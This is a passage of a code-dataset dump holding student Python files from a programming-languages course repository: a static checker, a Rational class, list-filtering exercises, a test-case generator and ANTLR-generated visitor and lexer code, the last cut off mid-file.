0:\n raise TypeMismatchInExpression(ctx)\n return e\n\n def visitIntLit(self,ctx:IntLit,o):\n return 1\n\n def visitFloatLit(self,ctx,o):\n return -1\n\n def visitBoolLit(self,ctx,o):\n return 0" }, { "alpha_fraction": 0.6164095401763916, "alphanum_fraction": 0.6178120374679565, "avg_line_length": 32.1860466003418, "blob_id": "a68660cecb56e13f51d2b7723ce3edafed00b4fe", "content_id": "9f59380393d6fe77ca1999d87c0a3be2791c9426", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1426, "license_type": "no_license", "max_line_length": 85, "num_lines": 43, "path": "/type/Q4_name.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "from functools import reduce\nclass StaticCheck(Visitor):\n \n def visitProgram(self,ctx:Program,o:object):\n env = reduce(lambda lst,x: lst + [self.visit(x,lst)], ctx.decl, [])\n\n def visitVarDecl(self,ctx:VarDecl,o:object):\n if ctx.name in o:\n raise RedeclaredVariable(ctx.name)\n else:\n return ctx.name\n\n def visitConstDecl(self,ctx:ConstDecl,o:object):\n if ctx.name in o:\n raise RedeclaredConstant(ctx.name)\n else:\n return ctx.name\n\n def visitFuncDecl(self,ctx:FuncDecl,o:object):\n if ctx.name in o:\n raise RedeclaredFunction(ctx.name)\n else:\n param = reduce(lambda lst, x: lst + [self.visit(x, lst)], ctx.param, [])\n decl = reduce(lambda lst, x: lst + [self.visit(x, lst)], ctx.body[0], [])\n env = o + [ctx.name] + param + decl\n exe=list(map(lambda x: self.visit(x,env), ctx.body[1]))\n return ctx.name\n\n\n def visitIntType(self,ctx:IntType,o:object): pass\n\n def visitFloatType(self,ctx:FloatType,o:object):pass\n\n def visitIntLit(self,ctx:IntLit,o:object):pass\n def visitIntType(self,ctx:IntType,o:object):pass\n\n def visitFloatType(self,ctx:FloatType,o:object):pass\n\n def visitIntLit(self,ctx:IntLit,o:object):pass\n\n def visitId(self,ctx:Id,o:object):\n if ctx.name not in o:\n raise UndeclaredIdentifier(ctx.name)" }, { "alpha_fraction": 0.49685534834861755, "alphanum_fraction": 0.5062893033027649, "avg_line_length": 24.479999542236328, "blob_id": "2aeb6e672089de75c6c7fb439330fa814de0c0b2", "content_id": "1138ba4b0b399cf3572bd27f56dd05b884e09036", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 636, "license_type": "no_license", "max_line_length": 112, "num_lines": 25, "path": "/OOP/Question2.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "class Rational:\n def __init__(self, n=0, d=1):\n g = self.__gcd(n, d)\n self.number = int(n / g)\n self.denom = int(d / g)\n \n def __gcd(self, n, d):\n if d == 0:\n return n\n else:\n return self.__gcd(d, n%d)\n\n def __add__(self, op):\n if isinstance(op, int):\n return self + Rational(op)\n return Rational((int(self.number * op.denom) + int(self.denom * op.number)), int(self.denom * op.denom))\n\n def toString(self):\n return str(self.number) + \"/\" + str(self.denom)\n\na = Rational(6, 4)\nb = 2\nc = a + b\nprint(a.toString())\nprint(c.toString())" }, { "alpha_fraction": 0.7208307981491089, "alphanum_fraction": 0.7251068949699402, "avg_line_length": 31.261083602905273, "blob_id": "7db8d81c147777e31264977f8ea493b3e11f09da", "content_id": "a5925b5534b56e841ad3eb02bb25f48f2afa0fcc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6548, "license_type": "no_license", "max_line_length": 88, "num_lines": 203, "path": "/Assignments/assignment3/target/main/bkit/parser/BKITVisitor.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from main/bkit/parser/BKIT.g4 by ANTLR 4.8\nfrom antlr4 import *\nif __name__ is not None and \".\" in __name__:\n from .BKITParser import BKITParser\nelse:\n from BKITParser import BKITParser\n\n# This class defines a complete generic visitor for a parse tree produced by BKITParser.\n\nclass BKITVisitor(ParseTreeVisitor):\n\n # Visit a parse tree produced by BKITParser#program.\n def visitProgram(self, ctx:BKITParser.ProgramContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#var_declare.\n def visitVar_declare(self, ctx:BKITParser.Var_declareContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#function_declare.\n def visitFunction_declare(self, ctx:BKITParser.Function_declareContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#stmt_list.\n def visitStmt_list(self, ctx:BKITParser.Stmt_listContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#stmt.\n def visitStmt(self, ctx:BKITParser.StmtContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#if_stmt.\n def visitIf_stmt(self, ctx:BKITParser.If_stmtContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#var_declare_stmt.\n def visitVar_declare_stmt(self, ctx:BKITParser.Var_declare_stmtContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#for_stmt.\n def visitFor_stmt(self, ctx:BKITParser.For_stmtContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#while_stmt.\n def visitWhile_stmt(self, ctx:BKITParser.While_stmtContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#dowhile_stmt.\n def visitDowhile_stmt(self, ctx:BKITParser.Dowhile_stmtContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#assign_stmt.\n def visitAssign_stmt(self, ctx:BKITParser.Assign_stmtContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#break_stmt.\n def visitBreak_stmt(self, ctx:BKITParser.Break_stmtContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#continue_stmt.\n def visitContinue_stmt(self, ctx:BKITParser.Continue_stmtContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#call_stmt.\n def visitCall_stmt(self, ctx:BKITParser.Call_stmtContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#return_stmt.\n def visitReturn_stmt(self, ctx:BKITParser.Return_stmtContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#expr.\n def visitExpr(self, ctx:BKITParser.ExprContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#expr1.\n def visitExpr1(self, ctx:BKITParser.Expr1Context):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#expr2.\n def visitExpr2(self, ctx:BKITParser.Expr2Context):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#expr3.\n def visitExpr3(self, ctx:BKITParser.Expr3Context):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#expr4.\n def visitExpr4(self, ctx:BKITParser.Expr4Context):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#expr5.\n def visitExpr5(self, ctx:BKITParser.Expr5Context):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#expr6.\n def visitExpr6(self, ctx:BKITParser.Expr6Context):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#array_cell.\n def visitArray_cell(self, ctx:BKITParser.Array_cellContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#expr7.\n def visitExpr7(self, ctx:BKITParser.Expr7Context):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#expr8.\n def visitExpr8(self, ctx:BKITParser.Expr8Context):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#operand.\n def visitOperand(self, ctx:BKITParser.OperandContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#function_call.\n def visitFunction_call(self, ctx:BKITParser.Function_callContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#index_op.\n def visitIndex_op(self, ctx:BKITParser.Index_opContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#array.\n def visitArray(self, ctx:BKITParser.ArrayContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#primitive_data.\n def visitPrimitive_data(self, ctx:BKITParser.Primitive_dataContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#array_lit.\n def visitArray_lit(self, ctx:BKITParser.Array_litContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#var_list.\n def visitVar_list(self, ctx:BKITParser.Var_listContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#var_init.\n def visitVar_init(self, ctx:BKITParser.Var_initContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#var_non_init.\n def visitVar_non_init(self, ctx:BKITParser.Var_non_initContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#composite_var.\n def visitComposite_var(self, ctx:BKITParser.Composite_varContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#composite_init.\n def visitComposite_init(self, ctx:BKITParser.Composite_initContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#primitive_init.\n def visitPrimitive_init(self, ctx:BKITParser.Primitive_initContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#params_list.\n def visitParams_list(self, ctx:BKITParser.Params_listContext):\n return self.visitChildren(ctx)\n\n\n\ndel BKITParser" }, { "alpha_fraction": 0.5095419883728027, "alphanum_fraction": 0.5839694738388062, "avg_line_length": 28.16666603088379, "blob_id": "230718114f50f0a6d7c23d73d606785f0064f858", "content_id": "e8025c7a8a72fa67eba9ef82efaa3d684eb38602", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 524, "license_type": "no_license", "max_line_length": 91, "num_lines": 18, "path": "/FP/Question3.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "def lessThan1(n, lst):\n return [x for x in lst if x < n]\n\ndef lessThan2(n, lst):\n return ([lst[0]] if lst[0] < n else []) + lessThan2(n, lst[1:]) if len(lst) > 0 else []\n\ndef lessThan3(n, lst):\n return list(filter(lambda x : x < n, lst))\n\ndef lessThan4(n, lst):\n from functools import reduce\n return list(reduce(lambda a,b: a + [b] if b < n else a, lst, []))\n\n# print(lessThan1(50, [1,2,50]))\n# print(lessThan2(50, [1, 2, 50]))\n# print(lessThan3(50, [1, 2, 50]))\nprint(lessThan4(50, [1, 2, 50]))\n# a = 2 + [1]" }, { "alpha_fraction": 0.48810499906539917, "alphanum_fraction": 0.49220672249794006, "avg_line_length": 35.93939208984375, "blob_id": "8b5d06939801321e544fcee3349cada1050e950d", "content_id": "91bde3fa92544d45b68e35517ac42768ebbbcec7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2438, "license_type": "no_license", "max_line_length": 257, "num_lines": 66, "path": "/Assignments/assignment1/src/genTest.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "import sys,os\n\ndef gen_lexer_testcase():\n f = open(\"./test/LexerSuite.py\", \"a\")\n done = False\n idx = int(input(\"Start index: \"))\n while not done:\n print(\"Enter the input (type donein to end the input, stop to end the genprocess): \")\n lines = []\n line_idx=1\n while True:\n line = input(\"#\" + str(line_idx) + \": \",)\n line_idx+=1\n if line == \"stop\":\n f.close()\n return\n if line != \"donein\":\n lines.append(line)\n else:\n break\n input_str = '\\n'.join(lines)\n expect_str = str(input(\"Enter the expected tokens separates by comma without <EOF>: \")) + \",<EOF>\"\n testcase_name = str(input(\"Enter the name without prefix test_: \"))\n testcase = \"\\n def test_\" + testcase_name + \"(self):\\n input=\\\"\\\"\\\"\" + input_str + \"\\\"\\\"\\\"\\n expect=\\\"\\\"\\\"\"+ expect_str + \"\\\"\\\"\\\"\\n num=\"+str(idx) + \"\\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\\n\\n\"\n idx+=1\n f.write(testcase)\n f.close()\n\ndef gen_parser_testcase():\n f = open(\"./test/ParserSuite.py\", \"a\")\n done = False\n idx = int(input(\"Start index: \"))\n while not done:\n print(\"Enter the input (type donein to end the input, stop to end the genprocess): \")\n lines = []\n line_idx=1\n while True:\n line = input(\"#\" + str(line_idx) + \": \",)\n line_idx+=1\n if line == \"stop\":\n f.close()\n return\n if line != \"donein\":\n lines.append(line)\n else:\n break\n input_str = '\\n'.join(lines)\n expect_str = str(input(\"Enter the expected result: \"))\n testcase_name = str(input(\"Enter the name without prefix test_: \"))\n testcase = \"\\n def test_\" + testcase_name + \"(self):\\n input=\\\"\\\"\\\"\" + input_str + \"\\\"\\\"\\\"\\n expect=\\\"\\\"\\\"\"+ expect_str + \"\\\"\\\"\\\"\\n num=\"+str(idx) + \"\\n self.assertTrue(TestParser.checkParser(input, expect, num))\\n\\n\"\n idx+=1\n f.write(testcase)\n f.close()\n\ndef main(argv):\n if len(argv) < 1:\n argv.append(str(input(\"Please enter mode (lexer/parser): \")))\n\n if argv[0] == \"lexer\":\n gen_lexer_testcase()\n\n if argv[0] == \"parser\":\n gen_parser_testcase()\n\nif __name__ ==\"__main__\":\n main(sys.argv[1:])\n" }, { "alpha_fraction": 0.30214396119117737, "alphanum_fraction": 0.5551301836967468, "avg_line_length": 55.7739143371582, "blob_id": "68dd4dad49ec3705b0e158b472f68705e0826e62", "content_id": "b95e8e9fdac13343abba39800167ec91d5ec72f0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13060, "license_type": "no_license", "max_line_length": 116, "num_lines": 230, "path": "/SyntaxAnalysis/tut/src/main/bkit/parser/.antlr/BKITLexer.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from /home/nguyendat/Documents/projects/PPL/SyntaxAnalysis/tut/src/main/bkit/parser/BKIT.g4 by ANTLR 4.8\nfrom antlr4 import *\nfrom io import StringIO\nfrom typing.io import TextIO\nimport sys\n\n\nfrom lexererr import *\n\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\2\\36\")\n buf.write(\"\\u0129\\b\\1\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\")\n buf.write(\"\\t\\7\\4\\b\\t\\b\\4\\t\\t\\t\\4\\n\\t\\n\\4\\13\\t\\13\\4\\f\\t\\f\\4\\r\\t\\r\")\n buf.write(\"\\4\\16\\t\\16\\4\\17\\t\\17\\4\\20\\t\\20\\4\\21\\t\\21\\4\\22\\t\\22\\4\\23\")\n buf.write(\"\\t\\23\\4\\24\\t\\24\\4\\25\\t\\25\\4\\26\\t\\26\\4\\27\\t\\27\\4\\30\\t\\30\")\n buf.write(\"\\4\\31\\t\\31\\4\\32\\t\\32\\4\\33\\t\\33\\4\\34\\t\\34\\4\\35\\t\\35\\4\\36\")\n buf.write(\"\\t\\36\\4\\37\\t\\37\\4 \\t \\4!\\t!\\4\\\"\\t\\\"\\4#\\t#\\4$\\t$\\4%\\t%\")\n buf.write(\"\\4&\\t&\\4\\'\\t\\'\\4(\\t(\\4)\\t)\\4*\\t*\\4+\\t+\\4,\\t,\\4-\\t-\\3\\2\")\n buf.write(\"\\3\\2\\3\\3\\3\\3\\3\\4\\3\\4\\3\\5\\3\\5\\5\\5d\\n\\5\\3\\6\\3\\6\\5\\6h\\n\\6\")\n buf.write(\"\\3\\6\\6\\6k\\n\\6\\r\\6\\16\\6l\\3\\7\\3\\7\\7\\7q\\n\\7\\f\\7\\16\\7t\\13\")\n buf.write(\"\\7\\3\\b\\6\\bw\\n\\b\\r\\b\\16\\bx\\3\\b\\3\\b\\5\\b}\\n\\b\\3\\b\\5\\b\\u0080\")\n buf.write(\"\\n\\b\\3\\t\\3\\t\\3\\t\\3\\n\\3\\n\\3\\n\\3\\13\\3\\13\\3\\13\\3\\f\\3\\f\\3\")\n buf.write(\"\\f\\5\\f\\u008e\\n\\f\\3\\r\\3\\r\\3\\16\\3\\16\\3\\17\\3\\17\\3\\17\\3\\17\")\n buf.write(\"\\5\\17\\u0098\\n\\17\\3\\17\\6\\17\\u009b\\n\\17\\r\\17\\16\\17\\u009c\")\n buf.write(\"\\3\\20\\6\\20\\u00a0\\n\\20\\r\\20\\16\\20\\u00a1\\3\\21\\3\\21\\3\\21\")\n buf.write(\"\\3\\21\\5\\21\\u00a8\\n\\21\\3\\21\\6\\21\\u00ab\\n\\21\\r\\21\\16\\21\")\n buf.write(\"\\u00ac\\3\\22\\3\\22\\3\\22\\5\\22\\u00b2\\n\\22\\3\\23\\3\\23\\3\\24\\3\")\n buf.write(\"\\24\\7\\24\\u00b8\\n\\24\\f\\24\\16\\24\\u00bb\\13\\24\\3\\24\\3\\24\\3\")\n buf.write(\"\\25\\3\\25\\3\\25\\3\\25\\3\\25\\3\\25\\3\\25\\3\\26\\3\\26\\3\\26\\3\\26\")\n buf.write(\"\\3\\27\\3\\27\\3\\27\\3\\27\\3\\27\\3\\27\\3\\30\\3\\30\\3\\31\\3\\31\\3\\32\")\n buf.write(\"\\3\\32\\3\\33\\3\\33\\3\\34\\3\\34\\3\\35\\3\\35\\3\\36\\3\\36\\3\\37\\3\\37\")\n buf.write(\"\\3 \\3 \\3!\\3!\\3\\\"\\3\\\"\\3#\\3#\\3$\\3$\\3%\\3%\\3&\\3&\\3\\'\\3\\'\\3\")\n buf.write(\"\\'\\7\\'\\u00f1\\n\\'\\f\\'\\16\\'\\u00f4\\13\\'\\3(\\3(\\7(\\u00f8\\n\")\n buf.write(\"(\\f(\\16(\\u00fb\\13(\\3(\\3(\\3)\\3)\\7)\\u0101\\n)\\f)\\16)\\u0104\")\n buf.write(\"\\13)\\3)\\3)\\3*\\3*\\3*\\3*\\7*\\u010c\\n*\\f*\\16*\\u010f\\13*\\3\")\n buf.write(\"*\\3*\\3*\\3*\\3*\\3+\\3+\\3+\\3+\\7+\\u011a\\n+\\f+\\16+\\u011d\\13\")\n buf.write(\"+\\3+\\3+\\3,\\3,\\3-\\6-\\u0124\\n-\\r-\\16-\\u0125\\3-\\3-\\4\\u010d\")\n buf.write(\"\\u011b\\2.\\3\\2\\5\\2\\7\\2\\t\\2\\13\\2\\r\\2\\17\\2\\21\\2\\23\\2\\25\\2\")\n buf.write(\"\\27\\2\\31\\2\\33\\2\\35\\2\\37\\2!\\2#\\3%\\4\\'\\5)\\6+\\7-\\b/\\t\\61\")\n buf.write(\"\\n\\63\\13\\65\\f\\67\\r9\\16;\\17=\\20?\\21A\\22C\\23E\\24G\\25I\\26\")\n buf.write(\"K\\27M\\30O\\31Q\\32S\\33U\\34W\\35Y\\36\\3\\2\\r\\3\\2c|\\3\\2C\\\\\\3\")\n buf.write(\"\\2\\62;\\4\\2GGgg\\3\\2\\60\\60\\t\\2))^^ddhhppttvv\\7\\2\\n\\f\\16\")\n buf.write(\"\\17$$))^^\\5\\2\\62;CHch\\3\\2\\629\\4\\2\\60\\60AA\\5\\2\\13\\f\\16\")\n buf.write(\"\\17\\\"\\\"\\2\\u0130\\2#\\3\\2\\2\\2\\2%\\3\\2\\2\\2\\2\\'\\3\\2\\2\\2\\2)\\3\")\n buf.write(\"\\2\\2\\2\\2+\\3\\2\\2\\2\\2-\\3\\2\\2\\2\\2/\\3\\2\\2\\2\\2\\61\\3\\2\\2\\2\\2\")\n buf.write(\"\\63\\3\\2\\2\\2\\2\\65\\3\\2\\2\\2\\2\\67\\3\\2\\2\\2\\29\\3\\2\\2\\2\\2;\\3\")\n buf.write(\"\\2\\2\\2\\2=\\3\\2\\2\\2\\2?\\3\\2\\2\\2\\2A\\3\\2\\2\\2\\2C\\3\\2\\2\\2\\2E\")\n buf.write(\"\\3\\2\\2\\2\\2G\\3\\2\\2\\2\\2I\\3\\2\\2\\2\\2K\\3\\2\\2\\2\\2M\\3\\2\\2\\2\\2\")\n buf.write(\"O\\3\\2\\2\\2\\2Q\\3\\2\\2\\2\\2S\\3\\2\\2\\2\\2U\\3\\2\\2\\2\\2W\\3\\2\\2\\2\")\n buf.write(\"\\2Y\\3\\2\\2\\2\\3[\\3\\2\\2\\2\\5]\\3\\2\\2\\2\\7_\\3\\2\\2\\2\\tc\\3\\2\\2\")\n buf.write(\"\\2\\13e\\3\\2\\2\\2\\rn\\3\\2\\2\\2\\17v\\3\\2\\2\\2\\21\\u0081\\3\\2\\2\\2\")\n buf.write(\"\\23\\u0084\\3\\2\\2\\2\\25\\u0087\\3\\2\\2\\2\\27\\u008d\\3\\2\\2\\2\\31\")\n buf.write(\"\\u008f\\3\\2\\2\\2\\33\\u0091\\3\\2\\2\\2\\35\\u0097\\3\\2\\2\\2\\37\\u009f\")\n buf.write(\"\\3\\2\\2\\2!\\u00a7\\3\\2\\2\\2#\\u00b1\\3\\2\\2\\2%\\u00b3\\3\\2\\2\\2\")\n buf.write(\"\\'\\u00b5\\3\\2\\2\\2)\\u00be\\3\\2\\2\\2+\\u00c5\\3\\2\\2\\2-\\u00c9\")\n buf.write(\"\\3\\2\\2\\2/\\u00cf\\3\\2\\2\\2\\61\\u00d1\\3\\2\\2\\2\\63\\u00d3\\3\\2\")\n buf.write(\"\\2\\2\\65\\u00d5\\3\\2\\2\\2\\67\\u00d7\\3\\2\\2\\29\\u00d9\\3\\2\\2\\2\")\n buf.write(\";\\u00db\\3\\2\\2\\2=\\u00dd\\3\\2\\2\\2?\\u00df\\3\\2\\2\\2A\\u00e1\\3\")\n buf.write(\"\\2\\2\\2C\\u00e3\\3\\2\\2\\2E\\u00e5\\3\\2\\2\\2G\\u00e7\\3\\2\\2\\2I\\u00e9\")\n buf.write(\"\\3\\2\\2\\2K\\u00eb\\3\\2\\2\\2M\\u00ed\\3\\2\\2\\2O\\u00f5\\3\\2\\2\\2\")\n buf.write(\"Q\\u00fe\\3\\2\\2\\2S\\u0107\\3\\2\\2\\2U\\u0115\\3\\2\\2\\2W\\u0120\\3\")\n buf.write(\"\\2\\2\\2Y\\u0123\\3\\2\\2\\2[\\\\\\t\\2\\2\\2\\\\\\4\\3\\2\\2\\2]^\\t\\3\\2\\2\")\n buf.write(\"^\\6\\3\\2\\2\\2_`\\t\\4\\2\\2`\\b\\3\\2\\2\\2ad\\5\\3\\2\\2bd\\5\\5\\3\\2c\")\n buf.write(\"a\\3\\2\\2\\2cb\\3\\2\\2\\2d\\n\\3\\2\\2\\2eg\\t\\5\\2\\2fh\\5\\61\\31\\2g\")\n buf.write(\"f\\3\\2\\2\\2gh\\3\\2\\2\\2hj\\3\\2\\2\\2ik\\5\\7\\4\\2ji\\3\\2\\2\\2kl\\3\")\n buf.write(\"\\2\\2\\2lj\\3\\2\\2\\2lm\\3\\2\\2\\2m\\f\\3\\2\\2\\2nr\\t\\6\\2\\2oq\\5\\7\")\n buf.write(\"\\4\\2po\\3\\2\\2\\2qt\\3\\2\\2\\2rp\\3\\2\\2\\2rs\\3\\2\\2\\2s\\16\\3\\2\\2\")\n buf.write(\"\\2tr\\3\\2\\2\\2uw\\5\\7\\4\\2vu\\3\\2\\2\\2wx\\3\\2\\2\\2xv\\3\\2\\2\\2x\")\n buf.write(\"y\\3\\2\\2\\2y\\177\\3\\2\\2\\2z|\\5\\r\\7\\2{}\\5\\13\\6\\2|{\\3\\2\\2\\2\")\n buf.write(\"|}\\3\\2\\2\\2}\\u0080\\3\\2\\2\\2~\\u0080\\5\\13\\6\\2\\177z\\3\\2\\2\\2\")\n buf.write(\"\\177~\\3\\2\\2\\2\\u0080\\20\\3\\2\\2\\2\\u0081\\u0082\\7^\\2\\2\\u0082\")\n buf.write(\"\\u0083\\n\\7\\2\\2\\u0083\\22\\3\\2\\2\\2\\u0084\\u0085\\7^\\2\\2\\u0085\")\n buf.write(\"\\u0086\\t\\7\\2\\2\\u0086\\24\\3\\2\\2\\2\\u0087\\u0088\\7)\\2\\2\\u0088\")\n buf.write(\"\\u0089\\7$\\2\\2\\u0089\\26\\3\\2\\2\\2\\u008a\\u008e\\n\\b\\2\\2\\u008b\")\n buf.write(\"\\u008e\\5\\23\\n\\2\\u008c\\u008e\\5\\25\\13\\2\\u008d\\u008a\\3\\2\")\n buf.write(\"\\2\\2\\u008d\\u008b\\3\\2\\2\\2\\u008d\\u008c\\3\\2\\2\\2\\u008e\\30\")\n buf.write(\"\\3\\2\\2\\2\\u008f\\u0090\\t\\t\\2\\2\\u0090\\32\\3\\2\\2\\2\\u0091\\u0092\")\n buf.write(\"\\t\\n\\2\\2\\u0092\\34\\3\\2\\2\\2\\u0093\\u0094\\7\\62\\2\\2\\u0094\\u0098\")\n buf.write(\"\\7z\\2\\2\\u0095\\u0096\\7\\62\\2\\2\\u0096\\u0098\\7Z\\2\\2\\u0097\")\n buf.write(\"\\u0093\\3\\2\\2\\2\\u0097\\u0095\\3\\2\\2\\2\\u0098\\u009a\\3\\2\\2\\2\")\n buf.write(\"\\u0099\\u009b\\5\\31\\r\\2\\u009a\\u0099\\3\\2\\2\\2\\u009b\\u009c\")\n buf.write(\"\\3\\2\\2\\2\\u009c\\u009a\\3\\2\\2\\2\\u009c\\u009d\\3\\2\\2\\2\\u009d\")\n buf.write(\"\\36\\3\\2\\2\\2\\u009e\\u00a0\\5\\7\\4\\2\\u009f\\u009e\\3\\2\\2\\2\\u00a0\")\n buf.write(\"\\u00a1\\3\\2\\2\\2\\u00a1\\u009f\\3\\2\\2\\2\\u00a1\\u00a2\\3\\2\\2\\2\")\n buf.write(\"\\u00a2 \\3\\2\\2\\2\\u00a3\\u00a4\\7\\62\\2\\2\\u00a4\\u00a8\\7q\\2\")\n buf.write(\"\\2\\u00a5\\u00a6\\7\\62\\2\\2\\u00a6\\u00a8\\7Q\\2\\2\\u00a7\\u00a3\")\n buf.write(\"\\3\\2\\2\\2\\u00a7\\u00a5\\3\\2\\2\\2\\u00a8\\u00aa\\3\\2\\2\\2\\u00a9\")\n buf.write(\"\\u00ab\\5\\33\\16\\2\\u00aa\\u00a9\\3\\2\\2\\2\\u00ab\\u00ac\\3\\2\\2\")\n buf.write(\"\\2\\u00ac\\u00aa\\3\\2\\2\\2\\u00ac\\u00ad\\3\\2\\2\\2\\u00ad\\\"\\3\\2\")\n buf.write(\"\\2\\2\\u00ae\\u00b2\\5\\37\\20\\2\\u00af\\u00b2\\5\\35\\17\\2\\u00b0\")\n buf.write(\"\\u00b2\\5!\\21\\2\\u00b1\\u00ae\\3\\2\\2\\2\\u00b1\\u00af\\3\\2\\2\\2\")\n buf.write(\"\\u00b1\\u00b0\\3\\2\\2\\2\\u00b2$\\3\\2\\2\\2\\u00b3\\u00b4\\5\\17\\b\")\n buf.write(\"\\2\\u00b4&\\3\\2\\2\\2\\u00b5\\u00b9\\7$\\2\\2\\u00b6\\u00b8\\5\\27\")\n buf.write(\"\\f\\2\\u00b7\\u00b6\\3\\2\\2\\2\\u00b8\\u00bb\\3\\2\\2\\2\\u00b9\\u00b7\")\n buf.write(\"\\3\\2\\2\\2\\u00b9\\u00ba\\3\\2\\2\\2\\u00ba\\u00bc\\3\\2\\2\\2\\u00bb\")\n buf.write(\"\\u00b9\\3\\2\\2\\2\\u00bc\\u00bd\\7$\\2\\2\\u00bd(\\3\\2\\2\\2\\u00be\")\n buf.write(\"\\u00bf\\7t\\2\\2\\u00bf\\u00c0\\7g\\2\\2\\u00c0\\u00c1\\7v\\2\\2\\u00c1\")\n buf.write(\"\\u00c2\\7w\\2\\2\\u00c2\\u00c3\\7t\\2\\2\\u00c3\\u00c4\\7p\\2\\2\\u00c4\")\n buf.write(\"*\\3\\2\\2\\2\\u00c5\\u00c6\\7k\\2\\2\\u00c6\\u00c7\\7p\\2\\2\\u00c7\")\n buf.write(\"\\u00c8\\7v\\2\\2\\u00c8,\\3\\2\\2\\2\\u00c9\\u00ca\\7h\\2\\2\\u00ca\")\n buf.write(\"\\u00cb\\7n\\2\\2\\u00cb\\u00cc\\7q\\2\\2\\u00cc\\u00cd\\7c\\2\\2\\u00cd\")\n buf.write(\"\\u00ce\\7v\\2\\2\\u00ce.\\3\\2\\2\\2\\u00cf\\u00d0\\7-\\2\\2\\u00d0\")\n buf.write(\"\\60\\3\\2\\2\\2\\u00d1\\u00d2\\7/\\2\\2\\u00d2\\62\\3\\2\\2\\2\\u00d3\")\n buf.write(\"\\u00d4\\7,\\2\\2\\u00d4\\64\\3\\2\\2\\2\\u00d5\\u00d6\\7\\61\\2\\2\\u00d6\")\n buf.write(\"\\66\\3\\2\\2\\2\\u00d7\\u00d8\\7*\\2\\2\\u00d88\\3\\2\\2\\2\\u00d9\\u00da\")\n buf.write(\"\\7+\\2\\2\\u00da:\\3\\2\\2\\2\\u00db\\u00dc\\7]\\2\\2\\u00dc<\\3\\2\\2\")\n buf.write(\"\\2\\u00dd\\u00de\\7_\\2\\2\\u00de>\\3\\2\\2\\2\\u00df\\u00e0\\7}\\2\")\n buf.write(\"\\2\\u00e0@\\3\\2\\2\\2\\u00e1\\u00e2\\7\\177\\2\\2\\u00e2B\\3\\2\\2\\2\")\n buf.write(\"\\u00e3\\u00e4\\7<\\2\\2\\u00e4D\\3\\2\\2\\2\\u00e5\\u00e6\\7\\60\\2\")\n buf.write(\"\\2\\u00e6F\\3\\2\\2\\2\\u00e7\\u00e8\\7=\\2\\2\\u00e8H\\3\\2\\2\\2\\u00e9\")\n buf.write(\"\\u00ea\\7.\\2\\2\\u00eaJ\\3\\2\\2\\2\\u00eb\\u00ec\\7?\\2\\2\\u00ec\")\n 